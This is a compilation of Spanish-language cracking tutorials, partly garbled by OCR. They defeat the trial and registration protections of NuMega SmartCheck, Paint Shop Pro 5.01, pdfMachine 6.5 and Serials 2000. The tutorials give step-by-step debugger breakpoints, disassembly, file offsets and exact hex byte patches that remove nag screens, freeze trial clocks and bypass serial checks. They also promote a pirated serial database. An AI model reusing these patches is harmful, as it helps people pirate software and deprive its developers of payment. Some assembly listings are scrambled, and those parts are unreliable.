nop. Vamos a desensamblar el archivo t132v20 con el w32dsam pero sorpresa donde esta el p.... archivo, en el directorio 
de smartcheck no esta a saber, habra que buscarlo para esto windows nos hechara una mano, vamos a la barra de inicio- 
buscar-archivos o carpetas ponemos tl32v20 y buscar vemos que aparece en el directorio de windows con que se queria 
esconder !eh¡, continuemos con el w32dasm y busquemos t132v20 que ya sabemos donde esta y carguemoslo, ahora 
pinchemos en goto code location y metemos el numero 10003EF4 que nos llevara directamente al salto que queriamos, 


busquemos el offset de esta direccion de memoria, miremos en la parte de abajo de la pantalla que pone line tal. page cual. 
code data 1000EF4. offset 000032f4 lo apuntamos y cerramos el desensamblador, habrimos cualquier editor hexadecimal 
y buscamos este offset apareceremos en 75 53 si queremos que no salte cambiaremos el 75 que es igual a jne por 74 que es 
igual a je o otra opcion seria cambiar 75 53 por 90 90 que seria igual a nop nop, la segunda opcion nunca saltaria metamos 
el codigo que metamos, pero en la primera opcion si tenemos mas chorra que felipito tacatum y acertamos metiendo el 
codigo correcto nos daria error. 


Una vez hecho esto comprobamos si funciona habrimos smartcheck metemos cualquier codigo y bingo nos da las gracias 
por registrarnos, pero cuando volvemos a habrir smartcheck nos vuelve a mostrar la dichosa pantallita, mal rollo para un 
novato como yo. 


Voy a intentar pensar como los grandes pofesionales, el programa cuando le damos a start vuelve a comprobar el codigo o 
si estamos registrados, intentare atacar esa llamada de comprobacion que hay arriba de nuestro salto, me meto en la rutina 
y veo un monton de llamadas hacia esa rutina, si solo hubiese sido una la podriamos haber atacado, pero encima de ser 
bastantes el programa cada vez que pulsamos start hace la llamada a esa rutina desde una posicion de memoria distinta. 
Dios mio que dolor de cabeza casi me se todo el proceso de esta proteccion. Bueno como seguir, ya tengo el numero de 
serie pero quiero hacerlo de otra manera. 


Pensemos, el proceso de proteccion corre en otro archivo que no es el ejecutable o sea smartcheck.exe, este ejecutable en 
algun momento tiene que hacer una llamada a este archivo, vamos a localizarla. 


3er intento: hay que eliminar la llamada a la proteccion y ponerle el valor que esta devuelve despues de pulsar OK en la 
pantalla de faltan x dias para que finalice esta demo. 


Estamos con smartcheck habierto y con un programa cargado, antes de pulsar sobre start que es cuando se llama a la 
proteccion, habrimos el sice (ctrl+d) y ponemos un breakpoint tal cual como - bpx dialogboxparam - ya digo el que puse 
directamente por que esto ya se esta haciendo demasiado largo y tengo que cenar, bueno cerramos el sice FS y pinchamos 
sobre start y salta el sice, pulsamos F12 y nos sale la pantalla de que nos quedan 45 dias, pinchamos sobre OK y salta otra 
vez el sice pulsamos F12 y estamos en el kernel de windows, fijaos en las letritas verdes del sice, pulsamos otra vez sobre 
F12 y estamos en la libreria tI32v20 nuestro archivo recordais, pero nosotros queremos ver el ejecutable cuando llama a 
esta libreria, pulsamos F12 y estamos en otra libreria pulsamos F12 hasta que en la parte de abajo de sice en las letritas 
verdes aparezca smartcheck, aparecemos aqui: 


:0040E462 FF73B0 push [ebp-50] 
:0040E465 6898264000 push 00402698 
:0040E46A 688C264000 push 0040268C 


:0040E46F FF152CA54200 call [0042A52C]--------- llamada a las rutinas de proteccion------- 
:0040E475 85C0 test eax, eax ------- nos devuelve aqui----------- 
:0040E477 7415 je 0040E48E -------- da el visto bueno--------- 


:0040E479 83BE9000000000 cmp dword ptr [esi+00000090], 00000000 
:0040E45F FF75EC push [ebp-14] 

:0040E462 FF73B0 push [ebp-50] 

:0040E465 6898264000 push 00402698 

:0040E46A 688C264000 push 0040268C 

:0040E46F B801000000 mov eax, 00000001 

:0040E474 90 nop 

:0040E475 85C0 test eax, eax 

:0040E477 7415 je 0040E48E 

:0040E479 83BE9000000000 cmp dword ptr [esi+00000090], 00000000 


Vemos que nos devuelve despues de pinchar sobre OK aqui en 0040E475 que hace una comparacion y luego un salto, lo 
veis claro no, ese salto hay que machacarlo, pues no, yo ya lo he probado y si lo cambias da un error, asi que hay que 
atacar a la llamada que esta mas arriba 0040E46F FF152CA54200 call [0042A52C], para que no haga la llamada, pero si 
la quitamos poniendo 6 nops, el programa no hace nada cuando pulsamos start, ya no nos enseña la nag de los dias ni 
caducaria, le hemos quitado la proteccion, pero el programa no hace nada, bueno pues hay que ver que registros cambian 
desde que entramos en la llamada hasta que pulsamos Ok y salimos, quitamos los bpx que tengamos y ponemos dos bpx 
0040E46F y bpx 0040E475, veis la idea el programa se parara antes de entrar en las rutinas de proteccion y cuando salga 
para fijarnos en todos los registros, hacemos todo el recorrido y vemos que cuando se para en el primer bpx el valor de eax 
es 0 y cuando volvemos de pulsar OK y se para en el segundo bpx el valor de eax es 1, pues ya lo tenemos, hay que quitar 
el call y subir eax a 1, vamos a ver como cambiar esto. 


Ejecutemos todo otra vez y nos paramos en el primer breakpoint que pusimos recuerda 


0040E46F call [0042A52C]--------- primer breakpoint------- 
0040E475 test eax, eax ------- segundo breakpoint----------- 


Fijaos que si restamos estas dos posiciones de memoria (0040E475-0040E46E) nos da 6 bytes que es lo que ocupa la 
instruccion call [0042A52C], o sea que si queremos quitar esta llamada tendremos que sustituir los 6 bytes por nops, si no 
lo hacemos asi nos saldran instruccion por enmedio y nos joderia el programa. Y como cambiar estos bytes, estamos 
encima de la direccion 0040E46F, ponemos en sice - d eip - y en la ventana de datos nos sale esta direccion con los bytes 
en hexadecimal. pues nos situamos sobre el primer byte de esa ventana y cambiamos los 6 primeros bytes por 90 y 
pulsamos enter, Veis en la ventana de codigo como nos han salido 6 lineas con nop. Ahora nos queda subir eax a 1 en el 
sice metemos una a y nos sale esto 015F:0040E46F escribimos mov eax,1 y pulsamos dos veces enter, antes que nada 
pongamos otra vez d eip y fijemonos en la pantalla de datos y apuntamos los 6 primeros bytes que habran quedado asi: B8 
01 00 00 00 90, como ya hemos terminado con el sice lo cerramos pulsamos FS un par de veces y ya se ejecuta el 
smartchek perfectamente sin mostrarnos la pantalla de limitacion. Ahora hay que cambiar lo que hemos hecho sobre el 
codigo del programa porque lo que hemos hecho a sido cambiarlo en memoria y cuando volvamos a arrancar el programa 
se habra borrado. 


Supongo que ya sabreis como cambiarlo, ya lo hemos hecho antes teneis que buscar el offset en w32dasm de la direccion 
0040E46F e ir al editor hexadecimal y cambiar los 6 bytes que habiamos cambiado en memoria. 


conclusiones: 


Hemos visto la fragilidad de estos programas que usan protecciones ajenas a este. Me explico esta misma proteccion la he 
visto en otros programas que no son de numega, por lo que deduzco que esta proteccion numega la ha comprado y la ha 
pegado a su programa, con lo cual la facilidad con que la hemos quitado. 


Un saludo a todos. Gracias a Karpoff y a todos los que teneis un tutorial en su web, sin vosotros saberlo sois mis mentores 
en este apasionante arte llamado INGENIERIA INVERSA. 


Por Fanega. fanegal Oairtel.net 


-] Cracking 2? tutorial l- 


-| MONO_AURELIO |- 


Jelou fieles seguidores ! En esta segunda entrega de nuestro curso cracking he 
decidido complicar un poco más el asunto ya que pienso que tendréis manejo 
con algunos programas como el W32Dasm. ¿Que no? Pues muy mal, no te has 
estudiado la lección, ve al primer tutorial y practica hasta que veas que vas 
teniendo control y que entiendes lo que estas haciendo. 


He estado consultando a la gente sobre temas que les gustaría que publicase, 
pero como no me han dicho nada original he decidido poner mi cracking favorito: 
Los programas de periodo de evaluacion. Leedlo con atención y disfrutad de él: 


TITULO: "De 30 dias de evaluación 
a un full time" 


Resolución deseada 1024 X 768 


Información del Programa: 


Nombre del programa: Paint Shop Pro 5.01 Trial version removal by Black Fenix 


Nombre del ejecutable: PaintShop.exe (varia de unas versiones a otras) 


Tipo: Programa de diseño gráfico y tratamiento de imágenes fotográficas. 


Url: http://www.softonic.com/ 


Herramientas que utilizaremos : 


Softlce para Windows 
W32Dasm 
Un editor hexadecimal (Ultraedit32 o HView) 


Vista Rápida de windows instalada (QuickView) 


+ _ Nota: puedes encontrar estas tools en www.astalavista.box.sk 


-| Let's go! l- 


( Abreviaturas usadas :Sl -> Softlce ) 


Primero debemos tener claro que es lo que vamos a hacer, en este caso se trata de un 
control de tiempo en concreto de 30 dias por lo que necesitaremos saber las funciones 
de windows que se encargan de obtener la hora del sistema son: 


GetSystemTime 
GetLocalTime 


Esas son las dos más utilizadas. Por otra parte necesitaremos saber que DLLs importa 
el ejecutable por lo que haremos click con el botón derecho del mouse sobre el 
ejecutable del programa y seleccionaremos vista rápida (en Inglés QuickView) esto nos 
dará la información que buscamos, apuntaremos los nombres de las DLL que usa el 
EXE y cargaremos los símbolos de estas en el Sl (en la versión 4 del Sl se pueden 
cargar dinámicamente sin tener que reiniciar el ordenador). 


Crackeando: 


Para empezar modificaremos la fecha del sistemay la adelantaremos lo suficiente un 
par de meses estaría bien. Si ejecutamos el programa veremos que nos da un mensaje 
en el cual nos 'invita' a salir del programa ya que se ha terminado el periodo de 
evaluación. Salimos y entramos en el SI (Ctrl+D) , estableceremos breakpoints en estas 
dos funciones: 


:bpx GetSystemtime 
:bpx GetLocalTime 


Nota: Hay que recordar que debemos tener cargados los símbolos que exporta la 


librería KERNEL32.DLL ya que estas dos funciones están en dicha DLL. 


Ok, salimos del Sl (Ctrl+D) y ejecutamos el Paint Shop Pro. Estamos de nuevo en el Sl 
ya que un breakpoint a surtido efecto, en la parte superior izquierda del Sl observamos 
que estamos dentro del modulo y función Kernel32!SetFileTime+0034 hmmmm. , 
parece que esto no tenga mucho que ver en un principio pero pulsamos F11 para 
retornar a la función que llamó a la del breakpoint y... Estamos en el 
móduloMSVCRT!'Time parece ser que el programa no llama directamente a las 
funciones de tiempo sino que lo hace por medio de la libreria MSVCRT.DLL. Si 
pensamos un poco y sabemos que la libreria MSVCRT tiene varias funciones para la 
gestión del tiempo nos ahorraremos mucho trabajo ya que existe una función dentro de 
la DLL MSVCRT llamada difftime que devuelve la diferencia entre dos tiempos en 
segundos y es probable que el programa la use en algún punto para calcular los días 
que quedan desde que se instaló el programa. La definición de este función en C sería: 


double difftime( time_t timer1, time_t timero ); 
Nota:time_t es un longint. 


Pues manos a la obra, borramos todos los breakpoints con BC * y salimos del Sl 
(Ctrl+D). El programa nos mostrará el mensaje típico diciendo que el tiempo de 
evaluación a terminado como es lógico ya que hemos adelantado la fecha un par de 
meses. Salimos del programa ya que no nos deja continuar y activamos el Sl (Ctrl+D), 
ponemos un breakpoint en la susodicha función: 


:bpx difftime 
y salimos del Sl de nuevo con Ctrl+D. 


Ejecutamos el programa y Boom!! aquí la tenemos. Podremos ver algo como esto en la 
ventana de código del Sl: 


PUSH EBP /// Guarda puntero de pila 

MOV EBP,ESP /1// Apunta EBP a los parametros pasados timer1 y timer0 
MOV EAX,[ESP+08] /// Carga TIMER1 en EAX 

SUB EAX,[ESP+0C]  /// Resta timer1-timerO 

MOV [EBP+08],EAX /// Guarda en timer? 

FILD DWORD PTR [EBP+08]  /// Convierte el resultado en un double 
POP EBP /// Restaura pila 

RET 


Este es el código de la función difftime la cual hace el cálculo entre el tiempo actual y el 
de instalación. si trazamos paso a paso con F10 después del RET podremos ver lo 
siguiente: 


PUSH EAX /// Empuja el primer tiempo 

PUSH ECX 11/ Empuja el segundo tiempo 

CALL [MSVCRT!.difftime] /// Esta es la función de donde hemos venido (cálcula la 
diferencia en segundos) 

ADD ESP,08 /// ESTAMOS AQUI!! en esta linea, ajusta la pila en 8 (tamaño de los 
(argumentos timer1 y timer0) 

CALL [MSVCRT!f_tol] 1// Convierte el resultado (es un double) a un long 

MOV ECX,EAX 1// Pasa la diferencia en segundos a ECX pej= 4589077 seg. En 
hexadecimal 460615 seg 

MOV EAX,C22E4507  /// EAX= 3257812231 

IMUL ECX /// Multiplica los segundos * 3275812231 resultado en EDX:EAX Ej: EDX= 
FFEF172E, EAX = E353D393 

ADD EDX,ECX /// Suma a EDX la diferencia anteriorEDX= FFEF172E + 460615 = 351D43 
SAR EDX,10 1// Desplaza con signo a la derecha 10 posiciones EDX= 35h - > 53 -> 
equivale a dividir entre 1024 

MOV EAX,EDX 1// EAX=35h -> 53 

SHR EAX,1F 111 Y divide entre 2147483648, EAX=0 En EAX y EDI se hayan los dias totales 
, ahora se suman en EDI 

LEA EDI,[EAX+EDX+01]  /// (Se suma 01 dia para que no sean 0 dias ) -> EDI = 54 dias 
CMP EDI,01 1/1 Ha pasado + de un día ? 

JGE 00589DAE  /// Salta si afirrmativo 


¿Que te parece?: 


Basicamente esta rutina pasa los segundos que retorna la función difftime a días y es 
precisamente esto es lo que nos está jodiendo, para comprobarlo puedes ver que pasa 
después del salto JGE, trazando paso a paso te darás cuenta que hay más 
instrucciones de comparación para EDI (días), lo más inteligente aquí sería modificar 
esta rutina para que el día siempre fuera 1 (EDI=1) antes de saltar, por lo que habrá 
pensar como. Necesitamos saber cuantos bytes ocupan las instrucciones aquí 
codificadas así que lo mejor será desensamblar el EXE con el W32Dasm e ir a la 
dirección de código donde se hace la llamada a difftime (esto lo podemos ver en el Sl al 
lado de la instrucción call) en nuestro caso es la xxxx:589D7F. 


Mientras el EXE se desensambla podemos hacer una copia del ejecutable por si las 
moscas ya que ahora vamos a modificar su código jejejejee :). Una vez desensamblado 
vamos al Menu Goto/Code Location e introducimos el valor 589D7F click en Ok y 
apareceremos al ladito de la llamada a difftime. 


Bajamos hasta el LEA EDI,[EAX+EDX+01] y vemos que esta instrucción ocupa 4 bytes 


si nuestra intención es hacer que el programa crea que siempre es el primer día, no 
bastará con un XOR EDI,EDI (2 bytes) y un par de NOPs (2 más) ya que será el día O y 
nuestra intención es que sea el dia 1. 


El Remate 


Como lo haremos? Fácil, sabemos que un MOV EDI,1 son 5 bytes (codificado 
BF01000000) y el LEA son 4 por lo que nos hará falta 1 byte más, de donde lo 
sacamos? pues facil tambien, de la instrucción previa al LEA el SHR EAX,1F. Mirando 
el código vemos que ocupa 3 bytes, pues bien los 2 primeros bytes los rellenaremos 
con un NOP cada uno y el tercer byte será el que nos falta. Por lo tanto si tenemos que 
modificar el EXE nos colocaremos sobre la línea del SHR EAX,1F asegurándonos que 
la línea de posición azul está justo encima de esta, miraremos abajo en la barra de 
estado del W32Dasm y veremos que donde pone (Offset vemos el valor 0018919Dh. 
Este valor es la posición del primer byte de la instrucción dentro del archivo por lo que 
lo apuntaremos en un papel para luego. Ahora sabemos que hay que sustituir a partir 
de esta posición 7 bytes de código (2 NOP + el MOV EDI,O) la codificación de estas 
instrucciones sería: 90 90 BF 01 00 00 00. Ok, nos vamos al editor hexadecimal 
abrimos el ejecutable, buscamos el offset18919D con las ordenes del editor si este las 
tiene o a mano si no las tiene (vaya mierda de editor xD) una vez allí reemplazamos los 
bytes por 9090BF01000000 y ya podemos ejecutar el programa. Ahora ya no pasarán 
los días para nuestra versión "especial". 


Palabras Finales: 


Si nos molesta la pantalla que sale al principio podemos eliminarla pero el trabajo sucio 
ya está hecho por lo que lo dejo a vuestro cargo. 


Una pista: 


DialogBoxParamindirect 
DialogBoxParamA 


Si quereis llegar a ser verdaderos crackers de élite no dejéis de practicar no solo con 
los ejemplos que pongo, sino con cualquier programa que sea similar a los que 
aparecen en los tutoriales. 


He de dar gracias por la ayuda a la realización de este tutorial a mi paisano 
JUANCHOPE, que es un peazo guena gente xD 


>>> Para cualquier duda que tengas escríbeme a mi correo electrónico 


Tutorial N* 2 


Programa: pdfíMachine Versión 6.5 
Descarga: http://broadgun.com 
Objetivo: Obtención del serial + hacer lo que se nos plazca 


Herramientas necesaria: W32Dasm, OFFset CALculator, Softice y Hiew (editor 
hexadecimal). 


Dificultad: Newbie 
Fecha:30/12/02 


Cracker: Prometeo 


Este tutorial está realizado Únicamente con fines educativos, y ya bien se 
sabe que no puedo hacerme responsable del mal uso que se pueda hacer de la 
información aquí comentada. Así que si te gusta el programa ya sabes debes 
comprarlo. 


Introducción: 


En si el programa es una utilidad bastante buena que funciona como si fuera 
una impresora mas en nuestra PC. 


Cuando queremos crear un archivo pdf lo que se hace es imprimir en el 
programa en que sé esta trabajando como en una impresora normal solo que en 
Nombres de impresora tenemos que seleccionar BroadGum pdfMachine e imprimir 
el documento, como resultado obtenemos una copia del documento que imprimimos 
solo que en formato paf. 


La verdad es una lastima que una utilidad tan buena como esta se opaque por 
su tan mala protección. 


La registración se realiza a la hora de instalarlo teniendo que completar en 
un formulario de registración un user id y una key, si no lo registramos en 
cada documento pdf que creemos no parecerá un lindo texto a 45 grados que 
dice pdfMachine trial version. 


Además apenas se realiza la instalación el programa se descomprime en el 
directorio de archivos temporarios de Windows que al finalizar la instalación 
sé autoborra así no dejando huellas. 


Hecha la trampa 


Bueno la manera de burlar esta porquería de protección si se puede llamar así 
es interminables, yo solo comentare 3 formas de tener nuestro programa 
registrado: 


*Por medio del softice: obtención del serial y saltarnos la ventana de 
registro con cualquier serial. 


*A través del softice y un editor hexadecimal evitaremos las ventanas que no 


nos guste o sea molesta. 


Obtención del serial: 


La obtención del serial se genera a partir de nuestro nombre por ende 
tendremos un para Cada usuario que quiera registrarlo, la manera en que 
encontraremos a este será completando el formulario de registración y luego 
entrando en softice con ctrl+d y colocando un break point en la api hmemcpy 
(bpx hmemcpy) salimos del softice con F5 le damos al botón de ok y estamos 
dentro del softice le damos F5 una ves para que en la primera pasada tome 
nuestro nombre de usuario y luego presionamos 8 veces F12 para llegar a 
nuestro programa víctima tracemos con F10 hasta ver algún salto condicional 
lo invertimos para ver que realiza este salto y nos pone 


Lo que significa que lo que verifica es de si introducimos algún carácter en 
User Id, a continuación tenemos un salto condicional muy similar que también 
si no introducimos ningún valor en Key nos muestra el cartel anterior. 


Seguimos traceando con F10 y vemos otro salto condicional, que nos resta por 
comprobar ah nuestro serial será tal ves, invertimos el salto sobre la marcha 
con el softice ( r fl z sobre el salto) desactivamos lo break poimt bd *, 
presionamos F5 y listo saltamos la ventana de registro y además nos da la 
gracias (una cosa que no me gusto demasiado de este programa es que cuando es 
registrado este se trata de conectar supuestamente enviando un pequeño 
detalle de la registración, será esto verdad o que carajo enviaran?????? el 
que quiera saber de que se trata que investigue). 


Si miramos unas línea arriba de nuestro salto nos encontramos con: 


PUSH EAX => Contiene uno numero extraños en mi caso 14240-17397 será el 
serial correcto? 


CALL 00416D10 => ingresamos en el call y efectivamente comprobamos que se 
trata de nuestro serial correcto ya que se comprueba carácter a carácter la 
comprobación entre el serial correcto y el inventado por nosotros. 


ADD ESP,10 


TEST EAX,EAX 


JNZ 004059D4=> es el salto de que le hablaba antes, invirtiendo este no 
importara que pongamos en los datos de registro ya que siempre nos registrara 
(| a no ser que sea el correcto Jejeje). 


Hacer lo que queramos: 


Lo que verdaderamente jode de este programa es la gran cantidad de ventanas 
que hay que andar pulsando para instalarlo, primeramente nos enseña los 
términos de la licencia, luego el lugar donde lo vamos a instalar, luego 


pregunta si tenemos los datos de registro si decimos que si a completar otra 
ventana con los datos de registración. 


Esto la verdad es que cansa hasta el más sano creo yo, por eso lo que vamos a 
hacer es que no aparezca mas la ventanita donde nos pregunta si tenemos los 
datos de registro y saltarnos también por consecuencia la ventana de registro 
con el programa registrado. 


Bueno la manera en que yo lo hice es muy simple primeramente ejecuto el 
instalador en el Symbol Loader del softice, nos aparece condiciones de 
licencia del programa aceptamos después aparece la ventana en donde elegimos 
el destino donde lo vamos a instalar una ves elegido el destino presionamos 
ctrl+d estamos dentro del softice, ponemos un break point en getdlgitem (bpx 
getdlgitem) y luego F5 le damos al OK y otra ves dentro del softice le damos 
una ves al F5 y luego una ves a F12 para volver al programa, luego lo que 
queda es armarse de un poco de paciencia y tracear un largo rato con F10 
hasta que nos aparezca el cartelito que dice Do you have registration code? 
le ponemos que si y estamos en el softice nuevamente pero justo arriba de la 
instrucción en que estamos se encuentra un call que contiene la rutina que 
muestra la frase Do you have registration code? y además si esta es saltada 
estaremos registrado. 


Apuntemos en un papel la dirección del call anterior y con W32Dasm 
desensamblemos el archivo setup.exe (como dije antes cuando se instala el 
programa se descomprime en un subdirectorio en c:lwindows1Temx y una ves 
finalizada la instalación sé autoborra, por lo tanto mientras aun la 
instalación sé este corriendo realizamos una copia de este subdirectorio a 
otra parte del disco así podemos finalizar la instalación y luego 
desensamblar la copia realizada), buscamos la dirección anotada con Goto Code 
Location y vemos: 


:0040745C 7425 je 00407483 => 1” salto a tener en cuenta 


T 


:0040745E 8A4D 


T 


¡E mov cl, byte ptr [ebp-12] 


:00407461 84C9 test cl, cl 


:00407463 7516 jne 0040747B 
:00407465 6880784400 push 00447880 


:0040746A E8F1D7FFFF call 00404C60 


:0040746F 83C404 add esp, 00000004 
:00407472 83F801 cmp eax, 00000001 
:00407475 0F94C0 sete al 


:00407478 8845E4 mov byte ptr [ebp-1C]1, al 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 


| :0040745C(C) 


:00407483 AO0BD814400 mov al, byte ptr [004481BD] 


:00407488 84C0 test al, al 

:0040748A 0F8580000000 jne 00407510 => 2” salto a tener en cuenta 
:00407490 GAFF push FFEFFFEFF 

:00407492 6A24 push 00000024 


* Possible Reference to String Resource ID=00006: "Do you have a registration 
code 2" 


:00407494 6A06 push 00000006 


:00407496 E8C8590200 call 0042CE63=>rutina de la que hablamos 


:0040749B 83F806 cmp eax, 00000006 => caemos aqui con el softice 


Carguemos en el Symbol Loader del softice el programa nuevamente pero 
borremos cualquier break point que pueda haber con bc * y luego coloquemos 
break ponit en los salto que hay que tener en cuenta. Si el primer salto se 
produce veremos lo que no queremos ver así que invertimos el salto y listo 
desactivamos los break point con bd * y presionamos F5 para que todo siga su 
curso y todo se instala sin problema. Ahora verifiquemos que este registrado 
hagamos un archivo pdf cualquiera para ver si nos pone el cartel en medio de 
la pagina a 45 grados que dice pdíMachine Trial Version pero parece que todo 
esta bien con este solo salto quitamos los carteles que no queríamos ver y 
además estamos registrado. 


Solo por curiosidad por que no nos fijamos para que sirve el segundo salto a 
tener en cuenta, hacemos lo mismo que antes cargamos el programa con el 
Symbol Loader pero colocamos un break point en el segundo salto, realizamos 
todo como antes e invertimos el salto, vemos que todo se realiza como en el 
1? salto sin mostrarnos las ventanas que no queremos ver y se instala 
correctamente, probemos el programa utilizándolo y podemos verificar que en 
los documento pdf creados vemos es el texto a 45” que dice pdfMachine Trial 
Version, entonces con el segundo salto logramos sacar las ventana que 
queríamos pero lo que no logramos es registrarlo. 


Bueno para terminar solo faltaría realizarlos cambios permanentemente al 
archivo setup.exe con un editor hexadecimal cambiando: 


:0040745C je 00407483 por: 0040745C jne 00407483 


El offset en el que tenemos que realizar los cambios lo obtenemos ya sea 
viéndolo en el W32Dasm o utilizando programas como OFFset CALculator que se 
lo utiliza abriendo el archivo que deseamos saber el offset y luego le 
ponemos la dirección, le damos a calcular y listo. 


Agradecimiento: A toda esta gente que crea día a día programas shareware y nos 
da la oportunidad de divertirnos un rato y de paso aprender. 


A Groovy por publicar mis tuto y por mantener esta magnifica web argentina. 


Contacto: cualquier duda, consulta o comentario mi e-mail es 
prometeolfdata54.com. 


Fecha 18 de Enero 2000 
Cracker XASX 
App Serials 2000 v6.0 


http://serialz2000.da.ru 
http://tntpower. hotmail.ru/ser2k60.zip 


Appz URL 


Protección Administration Tools Password Requerida 
Herramientas Para el password solo Softlce v4.x... y para jugar con el código W32DSM y un Editor Hexadecimal. 


Introducción 


Hola a todos, este es un tutorial básico dedicado/escrito para newbies. 
Intentaré explicar todo lo que pueda dando notas y conceptos interesantes. 


Espero que leyendo este tutorial aprendas y mejores tus cualidaded como cracker y aprendas algunos conceptos básicos. 
Esto no es un tutorial de 'cambia 74 a EB con el editor y mira como funciona', seguramente al acabar de leer esto (si eres un newbie) tengas 
algo nuevo en la cabeza :). 


La victima es el conocido Serials 2000 v6.0, una bonita recopilación de serials con una engine de busqueda muy buena... actualmente es la 
mayor lista disponible. 


Consiguelo (si es que no lo tienes ya), este programa hay que tenerlo, además asi podrás aplicar y practicar más facilmente con este tutorial. 
Ok, vamos a ver que protección tiene este programilla. 
Por cierto, mirad que conversación más interesante con el creador del Serials2000 :) 


<[Xasx]> ¡ get it in 2 min. 

<[Xasx]> or less 

<ThndrKiss> how? 

<ThndrKiss> the coder wants to know 

<[Xasx]> :) 

<ThndrKiss> because he put a anti-cracking routines in 
<[Xasx]> im cracker... 

<[Xasx]> of TNT 

<ThndrKiss> ¡ know 

<ThndrKiss> but was it easy?? 


Bueno, pues aquí va toda la desprotección para que veaís lo fácil que es saltarse unas cuantas 'anti-cracking routines' de esas que los 
programadores creen que han metido, pero realmente nosotros ni las veremos. 


Xasx / TNT! 


Cracking 


Serials 2k tiene una opción en el File Menu: Administration Tools que pide un PASSWORD. 


El sistema de protección del S2k es muy fácil de crackear, yo conseguí el password al minuto de ponerme a crackearle... cualquier cracker con 
mínimo nivel puede crackearle en un momento también. 


Solamente utilizaremos una herramienta para conseguir el password... como no, SoftIce (v3.x o 4.x). 


Asumo que tienes instalado y configurado correctamente el Softlce, y que sabes como hacer cosas básicas como poner un breakpoint y todo 


eso. 
Si no sabes nada de usar Softlce o ni si quiera le tienes instalado, primero leete un tutorial sobre como hacerle funcionar y luego vuelve aqui 


y 
Bueno, entonces tenemos SoftIce listo y el Serials 2k esperando ser crackeado. 


El primer paso es ver que tenemos... 
Una ventana que pide un password y los botones de Ok o Cancelar. 


Si ponemos un password inválido, nos saldrá una messagebox que dice 'Incorrect Password". 


Ok, todo normal... ahora nuesto 'amado' SoftlIce deberá trabajar un poco; necesitamos saber que hace el programa cuando pulsamos el boton 
OK, 


Para hacer esto tenemos que poner un breakpoint en el SoftIce, la mejor elección es 'romper' la aplicación cuando coge el password que 
hemos metido. Tenemos varios breakpoints (BPX) posibles para hacer esto, los más utilizados son: 


e GetDigltemTextA 
e GetWindowTextA 


Como inicialmente no sabemos cual va a funcionar, pondremos los dos en el softice a ver q pasa. 


Abre el Softlce (CTRL+D) 
bpx getdlgitemtexta 
bpx getwindowtexta 


Notas sobre los breakpoint: 


para listar todos los BPXs en SoftIce, escribe bl. (BreakPoint List) 

para borrar todos los BPXs en Softlce, escribe bc*. (BreakPoint Clear *= Remove All Set BreakPoints) 

para desactivar todos BPXs en Softlce, escribe bd*. (BreakPoint Disable *= Disable All Set BreakPoints) 

para activar todos los BPXs en Softlce, escribe be*, (BreakPoint Enabler *= Enable All Set BreakPoints) 

* puede ser cambiado por el número de breakpoint que queramos para activar/desactivar/borrarle. Ejemplos: bei | bd2 | be1,2 | bc1,2 


Esto hará al Softlce 'saltar' cuando la aplicación coja nuestro password. 
Ok, vamos a probar si funciona... introduce un password... por ejemplo: crackisfun y entonces pulsa OK. 


jejeje, bienvenido a Softlce :), ahora mismo estamos un paso después de que se haya cogido el password con la llamada getwindowtexta. 


Lo primero de todo, miramos en la barra verde esa de abajo del softice... estamos situados en código del USER32!. Esto no es dónde queremos 
llegar pq no es el Serials 2k exe. Para llegar a nuestro objetivo tenemos que ir saliendo de estas llamadas (calls). 


Pulsa F11 (para salir de la call) una vez para volver de la llamada actual, ok, ahora estamos en código del MFC42!. Esta es una DLL que usa el 
programa para funcionar. 

Podemos ver la instrucción RET (Return)... pulsa F10 (ejecutar la siguiente instrucción) varias veces para dejar esta call, después pulsa F10 y 
cuando pasamos el último RET ya nos situamos en código del Serials2k!... 

Bueno, solo hay dos instrucciones y después otro RET... pulsa otra vez F10 para salir de esta llamada... otra vez en código del MFC42!... pulsa 
F10 varias veces hasta llegar al RET y salir de esta llamada. 


Por Fin!, ya estamos en código del Serials2k!... hmm y parece interesante :) 
Nota: para moverte en la ventana de código debes usar CTRL+up o CTRL+down. 


Podemos ver este código: 


:00403445 EB8AECFOO0O Call 004103F8 

:0040344A 8B86E4000000 mov eax, dword ptr [esi+000000E£4] | Aquí aparecemos 
:00403450 8378F808 cmp dword ptr [eax-08], 00000008 
:00403454 7536 jne 0040348C 

:00403456 803868 cmp byte ptr [eax], 68 

:00403459 7531 jne 0040348C 

:0040345B 80780161 cmp byte ptr [eax+01], 61 
:0040345F 752B jne 0040348C 

:00403461 80780263 cmp byte ptr [eax+02], 63 
:00403465 7525 jne 0040348C 

:00403467 8078036B cmp byte ptr [eax+03], 6B 
:0040346B 751F jne 0040348C 

:0040346D 80780474 cmp byte ptr [eax+04], 74 
:00403471 7519 jne 0040348C 

:00403473 80780568 cmp byte ptr [eax+05], 68 
:00403477 7513 jne 0040348C 

:00403479 80780669 cmp byte ptr [eax+06], 69 
:0040347D 750D jne 0040348C 

:0040347F 80780773 cmp byte ptr [eax+07], 73 


:00403483 
:00403485 
:0040348C 


7507 
C7466001000000 
8BCE 


:0040348E 


:00403493 
:00403494 


E8D9CD0000 
5E 
C3 


jne 0040348C 

mov [esi+60], 00000001 
mov ecx, esi 

Cal11 0041026C 

pop esi 

ret 


Analisis del código paso por paso: 


Nota: para avanzar a la siguiente instrucción en el Softlce, se usa F10. 


He dividido el código en 2 grupos... el primero es este: 


Bueno, empezamos en el offset 0040344A. Como podemos ver el registro DS contiene un número... si el password que metimos fue 
'crackisfun', entonces, el númbero es 009. hmm nuestro password tiene 9 caractéres... pulsa F10 para avanzar a la siguiente instrucción 


La siguiente instrucción es: 


:0040344A 
:00403450 
:00403454 


:004034xx 


:0040348C 


8B86E4000000 
8378F808 
7536 


8BCE 


:0040348E 


:00403493 
:00403494 


E8D9CD0000 
BE 
C3 


mov eax, dword ptr [esi+000000E4] | Inicio, ve longitud de nuestro passw 
cmp dword ptr [eax-08], 00000008 | Comparacion longitud Password 
jne 0040348C | Salta si nuestra longitud del password no es 8 


mov ecx, esi | el offset donde salta... 
Cal11 0041026cC | llamada no importante 
pop esi | pone 0 al registro esi 

ret | vuelve de la llamada... adios 


La segunda instrucción hace una comparación: (( dword ptr [eax-08] )) con (( 8 )). 


Hecha un vistazo al registro EAX... pon: db eax en Softlce para localizar en la ventana de datos Datos de Registro EAX, ohhh!!!, estamos 
viendo nuestro pasword!... entonces s2k esta comparando 'el número de caracteres de nuestro password" con '8”... 


después de la comparación hay una instrucción JNE (Salta si no es igual). 


